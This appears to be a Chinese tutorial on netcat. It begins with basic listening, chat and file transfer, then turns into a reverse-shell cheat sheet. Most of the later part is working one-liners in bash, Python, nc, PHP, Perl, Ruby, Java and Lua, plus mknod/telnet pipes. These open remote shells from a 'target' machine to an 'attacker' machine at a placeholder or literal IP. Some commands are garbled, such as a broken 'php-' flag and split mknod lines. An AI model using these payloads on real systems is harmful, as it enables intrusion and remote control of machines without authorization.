1、nc的概念
1.什么是nc
nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具
2.nc的作用
(1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口
(2)端口的扫描,nc可以作为client发起TCP或UDP连接
(3)机器之间传输文件
(4)机器之间网络测速
2、nc命令参数说明
1) -l
用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。
2) -p <port>
指定端口,暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数)
3) -s
指定发送数据的源IP地址,适用于多网卡机
4) -u
指定nc使用UDP协议,默认为TCP
5) -v
输出交互或出错信息,新手调试时尤为有用
6)-w
超时秒数,后面跟数字
7)-z
表示zero,表示扫描时不发送任何数据
3、nc建立CS端
1.nc实现消息共享
服务端启动监听
nc -l 4444
客户端进行连接
nc IP 4444
客户端与服务端实现消息共享,即客户端的输入服务端可见,服务端的输入客户端可见。
2. NC实现文件传输
和局域网聊天是原理一样的,不过把输入输出重定向到文件
服务端设置监听
nc -l 9999 > recv.txt
客户端发送:
nc IP 9999 < send.txt
注:服务端和客户端都可做为接收端和发送端,发送端必须要有文件,接收端可以不创建文件,当接受端不创建文件时,会自动创建并将发送端地内容保存到文件,如果已存在文件将会覆盖其中内容
4. 正向反弹shell
在服务端(靶标机)启动监听
nc -lvvp 4444 -e /bin/bash
在客户端(攻击机)连接
nc IP 4444
这种连接又称正向连接,攻击机主动连接靶标机。
连接成功后便可执行命令。
5、反向反弹shell
1.bash版本
本地作为服务端开启监听(攻击机)
nc -lvnp 4444
或nc -vvlp 4444
目标机开启反弹
bash -i >& /dev/tcp/IP/4444 0>&1 bash -i 创建一个交互式的bash shell &> 将标准输出和标准错误都重定向到我们指定的文件 /dev/tcp/IP/4444 建立连接到IP的4444端口 0>&1 将文件描述符0重定向为文件描述符1,也就是标准输入被重定向为标准输出
2.python 反弹
本地作为服务器开启监听
nc -lvvp 444
靶标作为客户端开启反弹
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘IP‘,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/bash‘,‘-i‘]);"
3.nc反弹
本地作为服务器开启监听
nc -lvvp 4444
靶标机作为客户端反弹shell
nc -e /bin/bash IP 4444
4. php反弹
本地作为服务器开启监听
nc -lvnp 4444
靶标机作为客户端反弹shell
php- ‘exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")‘
或
php -r ‘$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");‘
5、perl反弹
本地作为服务器开启监听
nc -lvvp 4444
靶标机作为客户端反弹shell
perl -e ‘use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};‘
6、ruby反弹
本地作为服务器开启监听端口
nc -lvvp 4444
靶标作为客户端反弹shell
ruby -rsocket -e‘f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)‘
7.Java反弹
本地作为服务器开启监听端口
nc -lvvp 4444
靶标作为客户端反弹shell
r = Runtime.getRuntime()
p = r.
exec
([
"/bin/bash"
,
"-c"
,
"exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"
] as String[])
p.waitFor()
8.lua版本
本地作为服务器开启监听端口
nc -lvvp 4444
靶标作为客户端反弹shell
lua -e "require(‘socket‘);require(‘os‘);t=socket.tcp();t:connect(‘10.0.0.1‘,‘1234‘);os.execute(‘/bin/sh -i <&3 >&3 2>&3‘);"
9.nc不使用-e参数反弹
本地作为服务器开启监听端口
nc -lvvp 4444
靶标作为客户端反弹shell
mknod
/tmp/backpipe
p
/bin/sh
0<
/tmp/backpipe
| nc x.x.x.x 4444 1>
/tmp/backpipe
/bin/bash
-i >
/dev/tcp/173
.214.173.151
/8080
0<&1 2>&1
mknod
backpipe p && telnet 173.214.173.151 8080 0backpipe